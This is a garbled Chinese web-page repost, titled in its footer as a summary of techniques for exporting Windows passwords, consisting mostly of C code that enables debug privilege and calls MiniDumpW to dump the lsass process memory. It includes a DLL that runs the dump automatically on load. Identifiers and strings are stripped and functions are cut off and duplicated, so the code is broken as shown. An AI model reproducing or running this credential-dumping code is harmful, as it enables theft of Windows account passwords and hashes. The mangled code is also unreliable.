admin 管理员组文章数量: 887021
2023年12月24日发(作者:软件测试工程师的职业规划)
typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline);int GetPid(){ PROCESSENTRY32 pe32; = sizeof(pe32); HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == INVALID_HANDLE_VALUE) { printf("CreateToolhelp32Snapshot Error!"); return false; } BOOL bResult = Process32First(hProcessSnap, &pe32); while (bResult) { if (_stricmp(ile, "") == 0) { return 32ProcessID; } bResult = Process32Next(hProcessSnap, &pe32); } CloseHandle(hProcessSnap); return -1;}int Dump_Lsass() { HRESULT hr; _MiniDumpW MiniDumpW; _RtlAdjustPrivilege RtlAdjustPrivilege; ULONG t; MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(""), "MiniDumpW"); RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle("ntdll"), "RtlAdjustPrivilege"); if (MiniDumpW == NULL || RtlAdjustPrivilege == NULL) {
#pragma comment(lib,"")typedef HRESULT(WINAPI* _MiniDumpW)( DWORD arg1, DWORD arg2, PWCHAR cmdline);typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)( ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);int dump() { HRESULT hr; _MiniDumpW MiniDumpW; _RtlAdjustPrivilege RtlAdjustPrivilege; ULONG t; MiniDumpW = (_MiniDumpW)GetProcAddress( LoadLibrary(L""), "MiniDumpW"); RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress( GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege"); if (MiniDumpW == NULL) { return 0; } // try enable debug privilege RtlAdjustPrivilege(20, TRUE, FALSE, &t); wchar_t ws[100]; swprintf(ws, 100, L"%hs", "784 c: full"); //784是lsass进程的pid号 "
MiniDumpW(0, 0, ws); return 0;}BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: dump(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break;
版权声明:本文标题:导出windows密码技巧总结 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1703348751h447947.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论